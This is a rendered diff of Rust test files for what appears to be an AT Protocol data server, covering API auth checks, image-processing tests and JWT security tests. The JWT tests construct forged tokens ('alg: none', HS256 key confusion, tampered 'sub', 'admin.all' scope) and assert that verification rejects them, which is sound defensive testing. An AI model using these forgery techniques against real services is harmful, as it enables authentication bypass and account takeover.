-
async fn test_get_feed_requires_feed_param() {
76
-
let client = client();
77
-
let base = base_url().await;
78
-
let (jwt, _did) = create_account_and_login(&client).await;
79
-
let res = client
80
-
.get(format!("{}/xrpc/app.bsky.feed.getFeed", base))
81
-
.header("Authorization", format!("Bearer {}", jwt))
82
-
.send()
83
-
.await
84
-
.unwrap();
85
-
assert_eq!(res.status(), 400);
86
-
}
87
-
88
-
#[tokio::test]
89
-
async fn test_register_push_requires_auth() {
90
-
let client = client();
91
-
let base = base_url().await;
92
-
let res = client
93
-
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
94
-
.json(&json!({
95
-
"serviceDid": "did:web:example.com",
96
-
"token": "test-token",
97
-
"platform": "ios",
98
-
"appId": "xyz.bsky.app"
99
-
}))
100
-
.send()
101
-
.await
102
-
.unwrap();
103
-
assert_eq!(res.status(), 401);
104
-
}
···
+88
-249
tests/image_processing.rs
+88
-249
tests/image_processing.rs
···
8
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
9
let img = DynamicImage::new_rgb8(width, height);
10
let mut buf = Vec::new();
11
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
12
-
.unwrap();
13
buf
14
}
15
16
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
17
let img = DynamicImage::new_rgb8(width, height);
18
let mut buf = Vec::new();
19
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
20
-
.unwrap();
21
buf
22
}
23
24
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
25
let img = DynamicImage::new_rgb8(width, height);
26
let mut buf = Vec::new();
27
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
28
-
.unwrap();
29
buf
30
}
31
32
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
33
let img = DynamicImage::new_rgb8(width, height);
34
let mut buf = Vec::new();
35
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
36
-
.unwrap();
37
buf
38
}
39
40
#[test]
41
-
fn test_process_png() {
42
let processor = ImageProcessor::new();
43
-
let data = create_test_png(500, 500);
44
-
let result = processor.process(&data, "image/png").unwrap();
45
assert_eq!(result.original.width, 500);
46
assert_eq!(result.original.height, 500);
47
-
}
48
49
-
#[test]
50
-
fn test_process_jpeg() {
51
-
let processor = ImageProcessor::new();
52
-
let data = create_test_jpeg(400, 300);
53
-
let result = processor.process(&data, "image/jpeg").unwrap();
54
assert_eq!(result.original.width, 400);
55
assert_eq!(result.original.height, 300);
56
-
}
57
58
-
#[test]
59
-
fn test_process_gif() {
60
-
let processor = ImageProcessor::new();
61
-
let data = create_test_gif(200, 200);
62
-
let result = processor.process(&data, "image/gif").unwrap();
63
assert_eq!(result.original.width, 200);
64
-
assert_eq!(result.original.height, 200);
65
-
}
66
67
-
#[test]
68
-
fn test_process_webp() {
69
-
let processor = ImageProcessor::new();
70
-
let data = create_test_webp(300, 200);
71
-
let result = processor.process(&data, "image/webp").unwrap();
72
assert_eq!(result.original.width, 300);
73
-
assert_eq!(result.original.height, 200);
74
}
75
76
#[test]
77
-
fn test_thumbnail_feed_size() {
78
let processor = ImageProcessor::new();
79
-
let data = create_test_png(800, 600);
80
-
let result = processor.process(&data, "image/png").unwrap();
81
-
let thumb = result
82
-
.thumbnail_feed
83
-
.expect("Should generate feed thumbnail for large image");
84
-
assert!(thumb.width <= THUMB_SIZE_FEED);
85
-
assert!(thumb.height <= THUMB_SIZE_FEED);
86
-
}
87
88
-
#[test]
89
-
fn test_thumbnail_full_size() {
90
-
let processor = ImageProcessor::new();
91
-
let data = create_test_png(2000, 1500);
92
-
let result = processor.process(&data, "image/png").unwrap();
93
-
let thumb = result
94
-
.thumbnail_full
95
-
.expect("Should generate full thumbnail for large image");
96
-
assert!(thumb.width <= THUMB_SIZE_FULL);
97
-
assert!(thumb.height <= THUMB_SIZE_FULL);
98
-
}
99
100
-
#[test]
101
-
fn test_no_thumbnail_small_image() {
102
-
let processor = ImageProcessor::new();
103
-
let data = create_test_png(100, 100);
104
-
let result = processor.process(&data, "image/png").unwrap();
105
-
assert!(
106
-
result.thumbnail_feed.is_none(),
107
-
"Small image should not get feed thumbnail"
108
-
);
109
-
assert!(
110
-
result.thumbnail_full.is_none(),
111
-
"Small image should not get full thumbnail"
112
-
);
113
-
}
114
115
-
#[test]
116
-
fn test_webp_conversion() {
117
-
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
118
-
let data = create_test_png(300, 300);
119
-
let result = processor.process(&data, "image/png").unwrap();
120
-
assert_eq!(result.original.mime_type, "image/webp");
121
}
122
123
#[test]
124
-
fn test_jpeg_output_format() {
125
-
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
126
-
let data = create_test_png(300, 300);
127
-
let result = processor.process(&data, "image/png").unwrap();
128
-
assert_eq!(result.original.mime_type, "image/jpeg");
129
-
}
130
131
-
#[test]
132
-
fn test_png_output_format() {
133
-
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
134
-
let data = create_test_jpeg(300, 300);
135
-
let result = processor.process(&data, "image/jpeg").unwrap();
136
-
assert_eq!(result.original.mime_type, "image/png");
137
-
}
138
139
-
#[test]
140
-
fn test_max_dimension_enforced() {
141
-
let processor = ImageProcessor::new().with_max_dimension(1000);
142
-
let data = create_test_png(2000, 2000);
143
-
let result = processor.process(&data, "image/png");
144
-
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
145
-
if let Err(ImageError::TooLarge {
146
-
width,
147
-
height,
148
-
max_dimension,
149
-
}) = result
150
-
{
151
-
assert_eq!(width, 2000);
152
-
assert_eq!(height, 2000);
153
-
assert_eq!(max_dimension, 1000);
154
-
}
155
-
}
156
157
-
#[test]
158
-
fn test_file_size_limit() {
159
-
let processor = ImageProcessor::new().with_max_file_size(100);
160
-
let data = create_test_png(500, 500);
161
-
let result = processor.process(&data, "image/png");
162
-
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
163
-
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
164
-
assert!(size > 100);
165
-
assert_eq!(max_size, 100);
166
-
}
167
}
168
169
#[test]
170
-
fn test_default_max_file_size() {
171
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
172
}
173
174
#[test]
175
-
fn test_unsupported_format_rejected() {
176
let processor = ImageProcessor::new();
177
-
let data = b"this is not an image";
178
-
let result = processor.process(data, "application/octet-stream");
179
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
180
-
}
181
182
-
#[test]
183
-
fn test_corrupted_image_handling() {
184
-
let processor = ImageProcessor::new();
185
-
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
186
-
let result = processor.process(data, "image/png");
187
assert!(matches!(result, Err(ImageError::DecodeError(_))));
188
}
189
190
#[test]
191
-
fn test_aspect_ratio_preserved_landscape() {
192
let processor = ImageProcessor::new();
193
-
let data = create_test_png(1600, 800);
194
-
let result = processor.process(&data, "image/png").unwrap();
195
-
let thumb = result.thumbnail_full.expect("Should have thumbnail");
196
let original_ratio = 1600.0 / 800.0;
197
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
198
-
assert!(
199
-
(original_ratio - thumb_ratio).abs() < 0.1,
200
-
"Aspect ratio should be preserved"
201
-
);
202
-
}
203
204
-
#[test]
205
-
fn test_aspect_ratio_preserved_portrait() {
206
-
let processor = ImageProcessor::new();
207
-
let data = create_test_png(800, 1600);
208
-
let result = processor.process(&data, "image/png").unwrap();
209
-
let thumb = result.thumbnail_full.expect("Should have thumbnail");
210
let original_ratio = 800.0 / 1600.0;
211
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
212
-
assert!(
213
-
(original_ratio - thumb_ratio).abs() < 0.1,
214
-
"Aspect ratio should be preserved"
215
-
);
216
}
217
218
#[test]
219
-
fn test_mime_type_detection_auto() {
220
-
let processor = ImageProcessor::new();
221
-
let data = create_test_png(100, 100);
222
-
let result = processor.process(&data, "application/octet-stream");
223
-
assert!(result.is_ok(), "Should detect PNG format from data");
224
-
}
225
-
226
-
#[test]
227
-
fn test_is_supported_mime_type() {
228
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
229
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
230
assert!(ImageProcessor::is_supported_mime_type("image/png"));
···
235
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
236
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
237
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
238
-
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
239
-
}
240
241
-
#[test]
242
-
fn test_strip_exif() {
243
-
let data = create_test_jpeg(100, 100);
244
-
let result = ImageProcessor::strip_exif(&data);
245
-
assert!(result.is_ok());
246
-
let stripped = result.unwrap();
247
-
assert!(!stripped.is_empty());
248
-
}
249
250
-
#[test]
251
-
fn test_with_thumbnails_disabled() {
252
-
let processor = ImageProcessor::new().with_thumbnails(false);
253
-
let data = create_test_png(2000, 2000);
254
-
let result = processor.process(&data, "image/png").unwrap();
255
-
assert!(
256
-
result.thumbnail_feed.is_none(),
257
-
"Thumbnails should be disabled"
258
-
);
259
-
assert!(
260
-
result.thumbnail_full.is_none(),
261
-
"Thumbnails should be disabled"
262
-
);
263
-
}
264
265
-
#[test]
266
-
fn test_builder_chaining() {
267
let processor = ImageProcessor::new()
268
.with_max_dimension(2048)
269
.with_max_file_size(5 * 1024 * 1024)
···
272
let data = create_test_png(500, 500);
273
let result = processor.process(&data, "image/png").unwrap();
274
assert_eq!(result.original.mime_type, "image/jpeg");
275
-
}
276
-
277
-
#[test]
278
-
fn test_processed_image_fields() {
279
-
let processor = ImageProcessor::new();
280
-
let data = create_test_png(500, 500);
281
-
let result = processor.process(&data, "image/png").unwrap();
282
assert!(!result.original.data.is_empty());
283
-
assert!(!result.original.mime_type.is_empty());
284
-
assert!(result.original.width > 0);
285
-
assert!(result.original.height > 0);
286
-
}
287
-
288
-
#[test]
289
-
fn test_only_feed_thumbnail_for_medium_images() {
290
-
let processor = ImageProcessor::new();
291
-
let data = create_test_png(500, 500);
292
-
let result = processor.process(&data, "image/png").unwrap();
293
-
assert!(
294
-
result.thumbnail_feed.is_some(),
295
-
"Should have feed thumbnail"
296
-
);
297
-
assert!(
298
-
result.thumbnail_full.is_none(),
299
-
"Should NOT have full thumbnail for 500px image"
300
-
);
301
-
}
302
-
303
-
#[test]
304
-
fn test_both_thumbnails_for_large_images() {
305
-
let processor = ImageProcessor::new();
306
-
let data = create_test_png(2000, 2000);
307
-
let result = processor.process(&data, "image/png").unwrap();
308
-
assert!(
309
-
result.thumbnail_feed.is_some(),
310
-
"Should have feed thumbnail"
311
-
);
312
-
assert!(
313
-
result.thumbnail_full.is_some(),
314
-
"Should have full thumbnail for 2000px image"
315
-
);
316
-
}
317
-
318
-
#[test]
319
-
fn test_exact_threshold_boundary_feed() {
320
-
let processor = ImageProcessor::new();
321
-
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
322
-
let result = processor.process(&at_threshold, "image/png").unwrap();
323
-
assert!(
324
-
result.thumbnail_feed.is_none(),
325
-
"Exact threshold should not generate thumbnail"
326
-
);
327
-
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
328
-
let result = processor.process(&above_threshold, "image/png").unwrap();
329
-
assert!(
330
-
result.thumbnail_feed.is_some(),
331
-
"Above threshold should generate thumbnail"
332
-
);
333
-
}
334
-
335
-
#[test]
336
-
fn test_exact_threshold_boundary_full() {
337
-
let processor = ImageProcessor::new();
338
-
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
339
-
let result = processor.process(&at_threshold, "image/png").unwrap();
340
-
assert!(
341
-
result.thumbnail_full.is_none(),
342
-
"Exact threshold should not generate thumbnail"
343
-
);
344
-
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
345
-
let result = processor.process(&above_threshold, "image/png").unwrap();
346
-
assert!(
347
-
result.thumbnail_full.is_some(),
348
-
"Above threshold should generate thumbnail"
349
-
);
350
}
···
8
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
9
let img = DynamicImage::new_rgb8(width, height);
10
let mut buf = Vec::new();
11
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
12
buf
13
}
14
15
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
16
let img = DynamicImage::new_rgb8(width, height);
17
let mut buf = Vec::new();
18
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
19
buf
20
}
21
22
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
23
let img = DynamicImage::new_rgb8(width, height);
24
let mut buf = Vec::new();
25
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
26
buf
27
}
28
29
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
30
let img = DynamicImage::new_rgb8(width, height);
31
let mut buf = Vec::new();
32
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
33
buf
34
}
35
36
#[test]
37
+
fn test_format_support() {
38
let processor = ImageProcessor::new();
39
+
40
+
let png = create_test_png(500, 500);
41
+
let result = processor.process(&png, "image/png").unwrap();
42
assert_eq!(result.original.width, 500);
43
assert_eq!(result.original.height, 500);
44
45
+
let jpeg = create_test_jpeg(400, 300);
46
+
let result = processor.process(&jpeg, "image/jpeg").unwrap();
47
assert_eq!(result.original.width, 400);
48
assert_eq!(result.original.height, 300);
49
50
+
let gif = create_test_gif(200, 200);
51
+
let result = processor.process(&gif, "image/gif").unwrap();
52
assert_eq!(result.original.width, 200);
53
54
+
let webp = create_test_webp(300, 200);
55
+
let result = processor.process(&webp, "image/webp").unwrap();
56
assert_eq!(result.original.width, 300);
57
}
58
59
#[test]
60
+
fn test_thumbnail_generation() {
61
let processor = ImageProcessor::new();
62
63
+
let small = create_test_png(100, 100);
64
+
let result = processor.process(&small, "image/png").unwrap();
65
+
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
66
+
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
67
+
68
+
let medium = create_test_png(500, 500);
69
+
let result = processor.process(&medium, "image/png").unwrap();
70
+
assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail");
71
+
assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail");
72
+
73
+
let large = create_test_png(2000, 2000);
74
+
let result = processor.process(&large, "image/png").unwrap();
75
+
assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail");
76
+
assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail");
77
+
let thumb = result.thumbnail_feed.unwrap();
78
+
assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
79
+
let full = result.thumbnail_full.unwrap();
80
+
assert!(full.width <= THUMB_SIZE_FULL && full.height <= THUMB_SIZE_FULL);
81
+
82
+
let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
83
+
let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
84
+
assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none());
85
+
assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some());
86
87
+
let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
88
+
let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
89
+
assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none());
90
+
assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some());
91
92
+
let disabled = ImageProcessor::new().with_thumbnails(false);
93
+
let result = disabled.process(&large, "image/png").unwrap();
94
+
assert!(result.thumbnail_feed.is_none() && result.thumbnail_full.is_none());
95
}
96
97
#[test]
98
+
fn test_output_format_conversion() {
99
+
let png = create_test_png(300, 300);
100
+
let jpeg = create_test_jpeg(300, 300);
101
102
+
let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
103
+
assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp");
104
105
+
let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
106
+
assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg");
107
108
+
let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
109
+
assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png");
110
}
111
112
#[test]
113
+
fn test_size_and_dimension_limits() {
114
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
115
+
116
+
let max_dim = ImageProcessor::new().with_max_dimension(1000);
117
+
let large = create_test_png(2000, 2000);
118
+
let result = max_dim.process(&large, "image/png");
119
+
assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 })));
120
+
121
+
let max_file = ImageProcessor::new().with_max_file_size(100);
122
+
let data = create_test_png(500, 500);
123
+
let result = max_file.process(&data, "image/png");
124
+
assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. })));
125
}
126
127
#[test]
128
+
fn test_error_handling() {
129
let processor = ImageProcessor::new();
130
+
131
+
let result = processor.process(b"this is not an image", "application/octet-stream");
132
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
133
134
+
let result = processor.process(b"\x89PNG\r\n\x1a\ncorrupted data here", "image/png");
135
assert!(matches!(result, Err(ImageError::DecodeError(_))));
136
}
137
138
#[test]
139
+
fn test_aspect_ratio_preservation() {
140
let processor = ImageProcessor::new();
141
+
142
+
let landscape = create_test_png(1600, 800);
143
+
let result = processor.process(&landscape, "image/png").unwrap();
144
+
let thumb = result.thumbnail_full.unwrap();
145
let original_ratio = 1600.0 / 800.0;
146
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
147
+
assert!((original_ratio - thumb_ratio).abs() < 0.1);
148
149
+
let portrait = create_test_png(800, 1600);
150
+
let result = processor.process(&portrait, "image/png").unwrap();
151
+
let thumb = result.thumbnail_full.unwrap();
152
let original_ratio = 800.0 / 1600.0;
153
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
154
+
assert!((original_ratio - thumb_ratio).abs() < 0.1);
155
}
156
157
#[test]
158
+
fn test_utilities_and_builder() {
159
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
160
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
161
assert!(ImageProcessor::is_supported_mime_type("image/png"));
···
166
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
167
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
168
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
169
170
+
let data = create_test_png(100, 100);
171
+
let processor = ImageProcessor::new();
172
+
let result = processor.process(&data, "application/octet-stream");
173
+
assert!(result.is_ok(), "Should detect PNG format from data");
174
175
+
let jpeg = create_test_jpeg(100, 100);
176
+
let stripped = ImageProcessor::strip_exif(&jpeg).unwrap();
177
+
assert!(!stripped.is_empty());
178
179
let processor = ImageProcessor::new()
180
.with_max_dimension(2048)
181
.with_max_file_size(5 * 1024 * 1024)
···
184
let data = create_test_png(500, 500);
185
let result = processor.process(&data, "image/png").unwrap();
186
assert_eq!(result.original.mime_type, "image/jpeg");
187
assert!(!result.original.data.is_empty());
188
+
assert!(result.original.width > 0 && result.original.height > 0);
189
}
+269
-839
tests/jwt_security.rs
+269
-839
tests/jwt_security.rs
···
38
}
39
40
#[test]
41
-
fn test_jwt_security_forged_signature_rejected() {
42
let key_bytes = generate_user_key();
43
let did = "did:plc:test";
44
let token = create_access_token(did, &key_bytes).expect("create token");
45
let parts: Vec<&str> = token.split('.').collect();
46
let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
47
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature);
48
let result = verify_access_token(&forged_token, &key_bytes);
49
assert!(result.is_err(), "Forged signature must be rejected");
50
-
let err_msg = result.err().unwrap().to_string();
51
-
assert!(
52
-
err_msg.contains("signature") || err_msg.contains("Signature"),
53
-
"Error should mention signature: {}",
54
-
err_msg
55
-
);
56
-
}
57
58
-
#[test]
59
-
fn test_jwt_security_modified_payload_rejected() {
60
-
let key_bytes = generate_user_key();
61
-
let did = "did:plc:legitimate";
62
-
let token = create_access_token(did, &key_bytes).expect("create token");
63
-
let parts: Vec<&str> = token.split('.').collect();
64
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
65
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
66
payload["sub"] = json!("did:plc:attacker");
67
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
68
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
69
-
let result = verify_access_token(&modified_token, &key_bytes);
70
-
assert!(result.is_err(), "Modified payload must be rejected");
71
}
72
73
#[test]
74
-
fn test_jwt_security_algorithm_none_attack_rejected() {
75
let key_bytes = generate_user_key();
76
let did = "did:plc:test";
77
-
let header = json!({
78
-
"alg": "none",
79
-
"typ": TOKEN_TYPE_ACCESS
80
-
});
81
let claims = json!({
82
-
"iss": did,
83
-
"sub": did,
84
-
"aud": "did:web:test.pds",
85
-
"iat": Utc::now().timestamp(),
86
-
"exp": Utc::now().timestamp() + 3600,
87
-
"jti": "attacker-token-1",
88
-
"scope": SCOPE_ACCESS
89
});
90
-
let malicious_token = create_unsigned_jwt(&header, &claims);
91
-
let result = verify_access_token(&malicious_token, &key_bytes);
92
-
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
93
-
}
94
95
-
#[test]
96
-
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
97
-
let key_bytes = generate_user_key();
98
-
let did = "did:plc:test";
99
-
let header = json!({
100
-
"alg": "HS256",
101
-
"typ": TOKEN_TYPE_ACCESS
102
-
});
103
-
let claims = json!({
104
-
"iss": did,
105
-
"sub": did,
106
-
"aud": "did:web:test.pds",
107
-
"iat": Utc::now().timestamp(),
108
-
"exp": Utc::now().timestamp() + 3600,
109
-
"jti": "attacker-token-2",
110
-
"scope": SCOPE_ACCESS
111
-
});
112
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
113
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap());
114
use hmac::{Hmac, Mac};
115
type HmacSha256 = Hmac<Sha256>;
···
117
let mut mac = HmacSha256::new_from_slice(&key_bytes).unwrap();
118
mac.update(message.as_bytes());
119
let hmac_sig = mac.finalize().into_bytes();
120
-
let signature_b64 = URL_SAFE_NO_PAD.encode(&hmac_sig);
121
-
let malicious_token = format!("{}.{}", message, signature_b64);
122
-
let result = verify_access_token(&malicious_token, &key_bytes);
123
-
assert!(
124
-
result.is_err(),
125
-
"HS256 algorithm substitution must be rejected"
126
-
);
127
-
}
128
129
-
#[test]
130
-
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
131
-
let key_bytes = generate_user_key();
132
-
let did = "did:plc:test";
133
-
let header = json!({
134
-
"alg": "RS256",
135
-
"typ": TOKEN_TYPE_ACCESS
136
-
});
137
-
let claims = json!({
138
-
"iss": did,
139
-
"sub": did,
140
-
"aud": "did:web:test.pds",
141
-
"iat": Utc::now().timestamp(),
142
-
"exp": Utc::now().timestamp() + 3600,
143
-
"jti": "attacker-token-3",
144
-
"scope": SCOPE_ACCESS
145
-
});
146
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
147
-
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap());
148
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 256]);
149
-
let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
150
-
let result = verify_access_token(&malicious_token, &key_bytes);
151
-
assert!(
152
-
result.is_err(),
153
-
"RS256 algorithm substitution must be rejected"
154
-
);
155
}
156
157
#[test]
158
-
fn test_jwt_security_algorithm_substitution_es256_rejected() {
159
let key_bytes = generate_user_key();
160
let did = "did:plc:test";
161
-
let header = json!({
162
-
"alg": "ES256",
163
-
"typ": TOKEN_TYPE_ACCESS
164
-
});
165
-
let claims = json!({
166
-
"iss": did,
167
-
"sub": did,
168
-
"aud": "did:web:test.pds",
169
-
"iat": Utc::now().timestamp(),
170
-
"exp": Utc::now().timestamp() + 3600,
171
-
"jti": "attacker-token-4",
172
-
"scope": SCOPE_ACCESS
173
-
});
174
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
175
-
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap());
176
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
177
-
let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
178
-
let result = verify_access_token(&malicious_token, &key_bytes);
179
-
assert!(
180
-
result.is_err(),
181
-
"ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"
182
-
);
183
-
}
184
185
-
#[test]
186
-
fn test_jwt_security_token_type_confusion_refresh_as_access() {
187
-
let key_bytes = generate_user_key();
188
-
let did = "did:plc:test";
189
let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token");
190
let result = verify_access_token(&refresh_token, &key_bytes);
191
-
assert!(
192
-
result.is_err(),
193
-
"Refresh token must not be accepted as access token"
194
-
);
195
-
let err_msg = result.err().unwrap().to_string();
196
-
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
197
-
}
198
199
-
#[test]
200
-
fn test_jwt_security_token_type_confusion_access_as_refresh() {
201
-
let key_bytes = generate_user_key();
202
-
let did = "did:plc:test";
203
let access_token = create_access_token(did, &key_bytes).expect("create access token");
204
let result = verify_refresh_token(&access_token, &key_bytes);
205
-
assert!(
206
-
result.is_err(),
207
-
"Access token must not be accepted as refresh token"
208
-
);
209
-
let err_msg = result.err().unwrap().to_string();
210
-
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
211
-
}
212
213
-
#[test]
214
-
fn test_jwt_security_token_type_confusion_service_as_access() {
215
-
let key_bytes = generate_user_key();
216
-
let did = "did:plc:test";
217
-
let service_token =
218
-
create_service_token(did, "did:web:target", "com.example.method", &key_bytes)
219
-
.expect("create service token");
220
-
let result = verify_access_token(&service_token, &key_bytes);
221
-
assert!(
222
-
result.is_err(),
223
-
"Service token must not be accepted as access token"
224
-
);
225
}
226
227
#[test]
228
-
fn test_jwt_security_scope_manipulation_attack() {
229
let key_bytes = generate_user_key();
230
let did = "did:plc:test";
231
-
let header = json!({
232
-
"alg": "ES256K",
233
-
"typ": TOKEN_TYPE_ACCESS
234
-
});
235
-
let claims = json!({
236
-
"iss": did,
237
-
"sub": did,
238
-
"aud": "did:web:test.pds",
239
-
"iat": Utc::now().timestamp(),
240
-
"exp": Utc::now().timestamp() + 3600,
241
-
"jti": "scope-attack-token",
242
-
"scope": "admin.all"
243
-
});
244
-
let malicious_token = create_custom_jwt(&header, &claims, &key_bytes);
245
-
let result = verify_access_token(&malicious_token, &key_bytes);
246
-
assert!(result.is_err(), "Invalid scope must be rejected");
247
-
let err_msg = result.err().unwrap().to_string();
248
-
assert!(
249
-
err_msg.contains("Invalid token scope"),
250
-
"Error: {}",
251
-
err_msg
252
-
);
253
-
}
254
255
-
#[test]
256
-
fn test_jwt_security_empty_scope_rejected() {
257
-
let key_bytes = generate_user_key();
258
-
let did = "did:plc:test";
259
-
let header = json!({
260
-
"alg": "ES256K",
261
-
"typ": TOKEN_TYPE_ACCESS
262
});
263
-
let claims = json!({
264
-
"iss": did,
265
-
"sub": did,
266
-
"aud": "did:web:test.pds",
267
-
"iat": Utc::now().timestamp(),
268
-
"exp": Utc::now().timestamp() + 3600,
269
-
"jti": "empty-scope-token",
270
-
"scope": ""
271
-
});
272
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
273
-
let result = verify_access_token(&token, &key_bytes);
274
-
assert!(
275
-
result.is_err(),
276
-
"Empty scope must be rejected for access tokens"
277
-
);
278
-
}
279
280
-
#[test]
281
-
fn test_jwt_security_missing_scope_rejected() {
282
-
let key_bytes = generate_user_key();
283
-
let did = "did:plc:test";
284
-
let header = json!({
285
-
"alg": "ES256K",
286
-
"typ": TOKEN_TYPE_ACCESS
287
});
288
-
let claims = json!({
289
-
"iss": did,
290
-
"sub": did,
291
-
"aud": "did:web:test.pds",
292
-
"iat": Utc::now().timestamp(),
293
-
"exp": Utc::now().timestamp() + 3600,
294
-
"jti": "no-scope-token"
295
-
});
296
-
let token = create_custom_jwt(&header, &claims, &key_bytes);
297
-
let result = verify_access_token(&token, &key_bytes);
298
-
assert!(
299
-
result.is_err(),
300
-
"Missing scope must be rejected for access tokens"
301
-
);
302
-
}
303
304
-
#[test]
305
-
fn test_jwt_security_expired_token_rejected() {
306
-
let key_bytes = generate_user_key();
307
-
let did = "did:plc:test";
308
-
let header = json!({
309
-
"alg": "ES256K",
310
-
"typ": TOKEN_TYPE_ACCESS
311
});
312
-
let claims = json!({
313
-
"iss": did,
314
-
"sub": did,
315
-
"aud": "did:web:test.pds",
316
-
"iat": Utc::now().timestamp() - 7200,
317
-
"exp": Utc::now().timestamp() - 3600,
318
-
"jti": "expired-token",
319
-
"scope": SCOPE_ACCESS
320
});
321
-
let expired_token = create_custom_jwt(&header, &claims, &key_bytes);
322
-
let result = verify_access_token(&expired_token, &key_bytes);
323
-
assert!(result.is_err(), "Expired token must be rejected");
324
-
let err_msg = result.err().unwrap().to_string();
325
-
